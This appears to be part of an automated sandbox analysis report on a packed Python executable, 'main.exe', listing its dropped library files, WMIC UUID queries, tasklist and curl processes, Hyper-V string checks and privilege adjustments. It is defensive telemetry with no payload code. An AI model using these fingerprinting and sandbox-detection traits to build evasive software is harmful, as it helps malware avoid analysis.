            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_MD5.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\_ctypes.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\_cffi_backend.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\_decimal.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ecb.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\ossl-modules\legacy.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cast.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_poly1305.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_webp.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_des3.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_BLAKE2s.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\zstandard\backend_c.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_BLAKE2b.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography\hazmat\bindings\_rust.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_RIPEMD160.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_curve448.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\select.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin\mfc140u.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ofb.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_curve25519.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_des.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_ghash_portable.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\_uuid.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\win32\_win32sysloader.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_aes.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\python3.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ec_ws.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingcms.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_arc2.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ocb.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_MD2.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\psutil\_psutil_windows.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\VCRUNTIME140_1.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Math\_modexp.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\_brotli.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imaging.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\sqlite3.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\_elementtree.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Util\_strxor.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingtk.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\markupsafe\_speedups.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32\pywintypes311.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Util\_cpuid_c.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\_ssl.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\win32\win32api.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\win32\win32trace.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cfb.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\libssl-3.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\_bz2.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\_sqlite3.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_aesni.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA384.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\libcrypto-3.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\_queue.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32\pythoncom311.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_MD4.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingmath.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ctr.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\pyexpat.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\python311.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\libcrypto-3-x64.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA512.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\VCRUNTIME140.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ed25519.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA224.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ed448.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\win32com\shell\shell.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info\LICENSE.txtJump to behavior
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF733394C40 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF733394C40
            Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_hashlib.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_ARC4.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_asyncio.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_Salsa20.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_overlapped.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\zstandard\_cffi.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_lzma.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA1.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin\win32ui.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Protocol\_scrypt.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_socket.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_chacha20.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cbc.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_keccak.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA256.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\unicodedata.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_ghash_clmul.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_MD5.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_ctypes.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_cffi_backend.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_decimal.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ecb.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cast.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\ossl-modules\legacy.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_poly1305.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_webp.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_des3.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_BLAKE2s.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\zstandard\backend_c.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_BLAKE2b.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography\hazmat\bindings\_rust.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_RIPEMD160.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_curve448.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\select.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin\mfc140u.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_curve25519.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ofb.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_uuid.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_des.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_ghash_portable.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_aes.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\win32\_win32sysloader.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\python3.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingcms.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ec_ws.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ocb.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_arc2.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_MD2.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\psutil\_psutil_windows.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Math\_modexp.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_brotli.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imaging.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_elementtree.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Util\_strxor.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingtk.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\markupsafe\_speedups.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32\pywintypes311.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Util\_cpuid_c.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_ssl.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\win32\win32api.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\win32\win32trace.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cfb.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_bz2.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_sqlite3.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_aesni.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA384.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_queue.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32\pythoncom311.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_MD4.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingmath.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ctr.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\pyexpat.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\python311.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\libcrypto-3-x64.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA512.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ed25519.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ed448.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA224.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\win32com\shell\shell.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-19327
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF733398840 FindFirstFileExW,FindClose,0_2_00007FF733398840
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF733397800 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF733397800
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333B2AE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7333B2AE4
            Source: main.exe, 00000002.00000003.1977044312.000001E8935F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975698701.000001E8935C5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787609743.000001E8935EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1786073333.000001E8935EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1793564892.000001E89359C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1789469075.000001E8935EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976909466.000001E8935C6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1783710038.000001E893604000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001043628.000001E8935FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: curl.exe, 00000010.00000002.1850359269.000001A228639000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\main.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF73339C6FC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF73339C6FC
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333B46F0 GetProcessHeap,0_2_00007FF7333B46F0
            Source: C:\Users\user\Desktop\main.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF73339C8A0 SetUnhandledExceptionFilter,0_2_00007FF73339C8A0
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF73339BE60 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF73339BE60
